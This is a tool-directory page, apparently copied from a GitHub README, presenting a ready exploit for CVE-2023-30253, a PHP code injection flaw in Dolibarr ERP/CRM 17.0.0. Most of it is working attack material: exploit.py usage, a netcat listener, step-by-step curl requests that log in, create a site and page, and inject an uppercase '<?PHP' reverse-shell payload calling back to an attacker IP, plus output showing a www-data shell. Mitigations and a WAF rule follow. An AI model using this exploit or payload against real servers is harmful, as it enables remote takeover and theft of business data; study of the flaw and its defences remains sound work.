Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-30253-exploit — CVE-2023-30253 — Dolibarr ERP/CRM 17.0.0 PHPコードインジェクションによるRCE(教育用エクスプロイト) | Kitploit
ツール/GitHubGitHub/jeanback1/cve-2023-30253-exploit
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubjeanback1/cve-2023-30253-exploit

CVE-2023-30253-exploit

CVE-2023-30253 — Dolibarr ERP/CRM 17.0.0 PHPコードインジェクションによるRCE(教育用エクスプロイト)

リポジトリを見る
2ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2023-30253 — Dolibarr ERP/CRM 17.0.0 リモートコード実行

Python 3.8+ License CVSS

Dolibarr ERP/CRM v17.0.0 向けの PHP コードインジェクションエクスプロイトです。Website/CMS モジュールを介して、www-data ユーザーとして リバースシェル を取得できます。

⚠️ 教育目的および許可を得た監査にのみ使用してください。


📑 目次

  • CVE-2023-30253 とは?
  • 脆弱性の仕組み
  • 影響
  • このエクスプロイトの機能
  • 要件
  • インストール
  • 使用方法
  • 実践例
  • エクスプロイトの詳細解説
  • 軽減策
  • 参考情報

🔍 CVE-2023-30253 とは?

CVE-2023-30253 は、Dolibarr ERP/CRM 17.0.1 より前のバージョンにおける PHP コードインジェクション(CWE-94: Improper Control of Generation of Code)の脆弱性です。

2023 年 5 月に Swascan(現 Hacktivesecurity)チームによって発見・報告されました。この脆弱性は Website/CMS モジュールに存在し、認証済みユーザーが Dolibarr 内で Web サイトを作成・管理できるようにするものです。


⚙️ 脆弱性の仕組み

Dolibarr は、ユーザーが Website モジュールのページコンテンツに PHP コードを注入できないようにするフィルターを実装しています。しかし、このフィルターには 重大な欠陥 があります。それは 大文字と小文字を区別する(case-sensitive) ことです。

root@kitploit:~
// Código vulnerable (simplificado) en Dolibarr 17.0.0
if (preg_match('/<\?php/i', $content)) {
    // Bloquea solo "<?php" en minúsculas exactas... ¿o no?
    die("PHP code detected!");
}

フィルターは、小文字の <?php という文字列を文字どおり検索します。しかし PHP では、開始タグに 大文字と小文字の任意の組み合わせ を使用できます。つまり、次のようになります:

エクスプロイトはフィルターをバイパスするために <?PHP(大文字)を使用しますが、どのバリアントでも機能します。

さらに、フィルターはコンテンツを 保存する時点 でのみ適用されます。ページを 配信する 際、Dolibarr は追加のサニタイズなしでコンテンツを PHP インタープリターに渡すため、開始タグ <? が付いたコードはすべて実行されます。


💥 影響

認証済みの攻撃者は以下のことが可能です:

  • サーバー上での リモートコマンド実行(RCE)
  • Dolibarr のデータベース(顧客、請求書、ユーザー)へのアクセス
  • システムの機密ファイル(/etc/passwd、設定ファイル)の読み取り
  • 内部攻撃のピボットポイントとしてサーバーを使用
  • マルウェア、ウェブシェル、永続的なバックドアのインストール

なぜクリティカルなのか? Dolibarr は企業の ERP/CRM として使用されています。侵入が発生すると、顧客データ、財務情報、契約書、内部認証情報が漏えいする可能性があります。


🛠️ このエクスプロイトの機能

このエクスプロイトは、5 つのステップ で完全なエクスプロイトプロセスを自動化します:

root@kitploit:~
┌─────────────────────────────────────────────────────────┐
│                   CVE-2023-30253                       │
│                                                         │
│  1. Login          → Autenticarse en Dolibarr           │
│  2. Create Website → Crear un sitio web vacío           │
│  3. Create Page    → Crear una página en el sitio       │
│  4. Inject Shell   → Inyectar PHP reverse shell         │
│  5. Trigger        → Ejecutar el payload                │
│                                                         │
│  Resultado: 🎯 Shell reversa como www-data              │
└─────────────────────────────────────────────────────────┘

特徴:

  • ✅ アンチ CSRF トークンの自動処理
  • ✅ Cookie による永続セッション
  • ✅ pageid の自動検出
  • ✅ デバッグ用の verbose モード
  • ✅ カラー出力(無効化可能)
  • ✅ fsockopen + proc_open によるリバースシェルペイロード

📋 要件

  • Python 3.8+
  • requests
  • beautifulsoup4

または、単に次のコマンドを実行します:

root@kitploit:~
pip install -r requirements.txt

📦 インストール

root@kitploit:~
# Clonar el repositorio
git clone https://github.com/jeanback1/CVE-2023-30253-exploit.git
cd CVE-2023-30253-exploit

# Instalar dependencias
pip install -r requirements.txt

🚀 使用方法

root@kitploit:~
python exploit.py <target> <username> <password> <lhost> <lport> [opciones]

位置引数:

オプション:

オプション説明
-v, --verbose詳細なデバッグ情報を表示
--no-color出力の色を無効化
-h, --helpヘルプと例を表示

🎯 実践例

ターミナル 1 — リバースシェルリスナーを起動

root@kitploit:~
nc -lvnp 4444

ターミナル 2 — エクスプロイトを実行

root@kitploit:~
python exploit.py http://crm.board.htb admin admin 10.10.14.5 4444 --verbose

期待される出力

root@kitploit:~
════════════════════════════════════════════════════════
 CVE-2023-30253 — Dolibarr 17.0.0 RCE Exploit
════════════════════════════════════════════════════════

  Target:   http://crm.board.htb
  User:     admin
  LHOST:    10.10.14.5
  LPORT:    4444
  Site ID:  s3a1f2bc

──────────────────────────────────────────────────

[10:45:12] Paso 1/5: Iniciando sesión...
[10:45:12]   ✓ Sesión iniciada correctamente

[10:45:13] Paso 2/5: Creando sitio web...
[10:45:13]   ✓ Sitio web 's3a1f2bc' creado

[10:45:13] Paso 3/5: Creando página en el sitio...
[10:45:13]   ✓ Página creada dentro del sitio

[10:45:14] Paso 4/5: Inyectando reverse shell → 10.10.14.5:4444...
[10:45:14]   ✓ Código PHP inyectado exitosamente

[10:45:14] Paso 5/5: Ejecutando payload (trigger)...

════════════════════════════════════════════════════════
  EXPLOTACIÓN COMPLETADA
════════════════════════════════════════════════════════

  Trigger URL:
  http://crm.board.htb/public/website/index.php?website=s3a1f2bc&pageref=s3a1f2bc

  Instrucciones:
  1. En otra terminal, inicia tu listener:
     nc -lvnp 4444
  2. Accede a la Trigger URL (el exploit ya lo hizo)
  3. Recibirás una shell reversa como www-data

ターミナル 1 — シェル取得成功 🎯

root@kitploit:~
Listening on 0.0.0.0 4444
Connection received on 10.129.231.37 52846
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

🔬 エクスプロイトの詳細解説

スクリプトを使わずに手動でプロセスを理解したい場合は、以下が完全なフローです:

1. 認証

root@kitploit:~
# Obtener cookies y token CSRF
curl -c cookies.txt http://crm.board.htb/ > /dev/null

# Extraer token
TOKEN=$(curl -s -b cookies.txt http://crm.board.htb/ \
  | grep -oP 'name="anti-csrf-newtoken" content="\K[^"]+')

# Login
curl -b cookies.txt -c cookies.txt \
  -X POST "http://crm.board.htb/index.php?mainmenu=home" \
  -d "token=$TOKEN&actionlogin=login&loginfunction=loginfunction&username=admin&password=admin"

⚠️ 学んだ教訓: 正しい action パラメータは addsite であり、一部の公開エクスプロイトに記載されている add ではありません。

2. Web サイトを作成

root@kitploit:~
TOKEN=$(curl -s -b cookies.txt \
  "http://crm.board.htb/website/index.php?action=createsite" \
  | grep -oP 'name="anti-csrf-newtoken" content="\K[^"]+')

curl -b cookies.txt -X POST \
  "http://crm.board.htb/website/index.php" \
  -d "token=$TOKEN&action=addsite&WEBSITE_REF=misitio&WEBSITE_TITLE=misitio&addcontainer=Create"

3. ページを作成

root@kitploit:~
TOKEN=$(curl -s -b cookies.txt \
  "http://crm.board.htb/website/index.php?website=misitio" \
  | grep -oP 'name="anti-csrf-newtoken" content="\K[^"]+')

curl -b cookies.txt -X POST \
  "http://crm.board.htb/website/index.php" \
  -d "token=$TOKEN&action=addcontainer&website=misitio&WEBSITE_TYPE_CONTAINER=page&WEBSITE_TITLE=TEST&addcontainer=Create"

4. PHP コードを注入

root@kitploit:~
TOKEN=$(curl -s -b cookies.txt \
  "http://crm.board.htb/website/index.php?website=misitio&pageid=1&action=editsource" \
  | grep -oP 'name="anti-csrf-newtoken" content="\K[^"]+')

PHP='<?PHP $s=fsockopen("10.10.14.5",4444);proc_open("/bin/sh -i",array(0=>$s,1=>$s,2=>$s),$p);?>'

curl -b cookies.txt -X POST \
  "http://crm.board.htb/website/index.php" \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode "action=updatesource" \
  --data-urlencode "website=misitio" \
  --data-urlencode "PAGE_CONTENT=$PHP"

🔑 攻撃の鍵: 正しいフィールドは PAGE_CONTENT であり、WEBSITE_CONTENT ではありません。多くの公開 PoC にこの誤りがあります。

5. ペイロードを実行

root@kitploit:~
curl "http://crm.board.htb/public/website/index.php?website=misitio&pageref=misitio"

🛡️ 軽減策

この脆弱性から Dolibarr サーバーを保護するには:

更新(推奨)

root@kitploit:~
# Actualizar a Dolibarr 17.0.1 o superior
# El parche corrige el filtro para detectar cualquier variante de <?php

Website モジュールを無効化する

Website/CMS モジュールを使用していない場合は、以下の場所から無効化してください:

root@kitploit:~
Home → Setup → Modules → Website → Desactivar

WAF ルール(mod_security)

root@kitploit:~
# Bloquear cualquier variante de etiquetas PHP en el campo PAGE_CONTENT
SecRule ARGS:PAGE_CONTENT "@rx <\?php|< \?php|<\?PHP|<\?[pP][hH][pP]" \
  "id:1001,phase:2,deny,status:403,msg:'CVE-2023-30253 PHP Injection blocked'"

最小権限の原則

  • 日常的なユーザーに管理者アカウントを使用しない
  • Website モジュールにアクセスできるユーザーを制限する

📚 参考情報

  • NVD — CVE-2023-30253
  • Swascan Advisory — Dolibarr 17.0.0 Analysis
  • Dolibarr GitHub — パッチのコミット
  • CWE-94: Code Injection
  • Hacktivesecurity — 元レポート

📝 免責事項

このプロジェクトは、情報セキュリティの教育および研究目的 で作成されています。明示的な許可なくシステムに対してこのエクスプロイトを使用することは、違法であり倫理的にも非難されるべき行為です。

サイバーセキュリティの専門家として、私は以下を強く信じています:

  • 脆弱性の責任ある開示
  • 許可を得た倫理的ハッキング
  • 集団全体のセキュリティ向上のための知識共有

作成者: Jean Carlos
サイバーセキュリティ学生 | Pentesting | CTF Player
CVE-2021-3560 • CVE-2023-27163 • CVE-2024-46986 • CVE-2025-2304

ツールをダウンロード
項目値
CVECVE-2023-30253
CVSS v3.18.8 (HIGH)
VectorAV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
タイプCWE-94 — コードインジェクション
影響を受けるソフトウェアDolibarr ERP/CRM < 17.0.1
権限認証済みユーザー(任意のロール)
パッチDolibarr 17.0.1 — コミット 4f6055c
タグフィルターで検出?PHP で実行?
<?php ... ?>✅✅
<?PHP ... ?>❌✅
<?Php ... ?>❌✅
<?pHp ... ?>❌✅
引数説明例
targetDolibarr のベース URLhttp://crm.board.htb
usernameDolibarr のユーザー名admin
passwordDolibarr のパスワードadmin
lhost自分の IP(シェルを受信する場所)10.10.14.5
lport自分のポート(シェルを受信する場所)4444